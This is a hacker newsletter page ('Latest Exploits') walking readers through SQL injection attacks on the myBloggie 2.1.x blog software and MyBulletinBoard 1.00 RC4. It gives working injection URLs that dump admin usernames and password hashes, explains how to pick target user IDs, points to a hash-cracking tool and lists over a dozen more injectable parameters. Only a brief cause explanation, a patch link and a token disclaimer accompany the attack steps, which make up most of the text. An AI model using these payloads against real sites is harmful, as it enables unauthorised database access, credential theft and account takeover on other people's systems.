HBH Newsletter
| HBH News | | WebWars | | Hacking News | | Hacking Skills | | Newsletter Article | | Interview | | Latest Exploits | | Credits |

Latest Exploits:


MyBloggie SQL exploit:

Vulnerable Systems:

* myBloggie version 2.1.1

* myBloggie version 2.1.2

This is a php based webblog system, the new thing "you just gotta have".
A blog is something where people put their - ow so interesting - life in and in the case when they can't code their own stuff they use cms's like this.
So in this particular open source software there is an sql injection exploit, which can be used to get admin hashes.
You can check if you can inject sql injection by going to the site, f.e.

www.example.com/mybloggie/index.php

and then inputting

mode=search&keyword=test'UNION SELECT * FROM test

if you get a nice sql error saying that your syntax isn't like it is supposed to be then you know you can exploit it.
To get the admin hashes use this link;

www.example.com/index.php?month_no=1&year=1&mode=viewdate&date_no=
1%20UNION%20SELECT%20null,null,null,null,user,password,null,null,null,null%20FROM%20blog_user/*

this will post all admin hashes and the nicknames. Yippie
Now that you have the hashes you can start cracking it, cain& abel is a good program for cracking md5 hashes, also the most know for it.
this can be found at: http://www.oxid.it/cain.html

So how did it work:
Well basically when you do the month_no=1&year=1&mode=viewdate&date_no=1 it goes to the sql database and get's the info stored in the variables month_no and year out of the db.
This is done through sql commands, now due to bad checking of the inputted text you are able to input sql commands to ask the database what you want and hey, everyone knows when you ask something nicely you always get what you want :p

/$\ source: security focus /$\

My BulletinBoard sql injection exploit:

Vurnable Systems:
*MyBulletinBoard 1.00 Release Candidate 4

Well a second exploit works on the same principle as the one above. Basically because of a lack of user input checking in some variables a user is granted to ask the db nifty sql questions :)
So if we would bring it into real life this would be it;

www.example.com/myBB/

{it could be named anything instead of the myBB folder, but that's the default from installation}
Then the first thing we can do is go to the calendar.php page and there's where we ask the db for the password hash by doing this:

www.example.com/myBB/calendar.php?action=event&eid='%20UNION%20SELECT
%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE uid=(the id you want)/*

If the board is vurnable we get a nice output with the user hash of the uid inputted. To know which userid you want, check the member pages and click on the profiles => in the url you will see the userid.
if the exploit didn't work it could be because of the settings of the sql database so luckily for us there are still a lot of variables exploitable :)

http://www.example.com/mybb/online.php?pidsql=)[sql_query] http://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query] http://www.example.com/mybb/editpost.php?pid='[sql_query] http://www.example.com/mybb/forumdisplay.php?fid='[sql_query] http://www.example.com/mybb/newreply.php?tid='[sql_query] http://www.example.com/mybb/search.php?action=results&sid='[sql_query] http://www.example.com/mybb/showthread.php?tid='[sql_query] http://www.example.com/mybb/showthread.php?pid='[sql_query] http://www.example.com/mybb/usercp2.php?tid='[sql_query] http://www.example.com/mybb/printthread.php?tid='[sql_query] http://www.example.com/mybb/reputation.php?pid='[sql_query] http://www.example.com/mybb/portal.php?action=do_login&username='[sql_query] http://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query] http://www.example.com/mybb/ratethread.php?tid='[sql_query]


/$\source: http://www.securityalertz.com/Article907.html /$\

how to solve this : http://www.mybboard.com/community/showthread.php?tid=2559 //security patch

Disclaimer:
Make sure you only use this for educational purpose, everything illegal you do with it is your thing and HBH nor me takes responsibility for it.
Don't get all stupid with this, because 5 minutes of fame isn't really rewarding enough for the "shower fun hour" your future cell mates could play with you for the next 3 months. :)

Don't sit still, do the thing you love the most, but do it with style and honour :D

Any comments, fanmail, hatemail, suggestions, help, you know how to find me.

[$]Anarcho-Hippie[$]
Html Format by Anarcho-Hippie - HBHNewsletter 01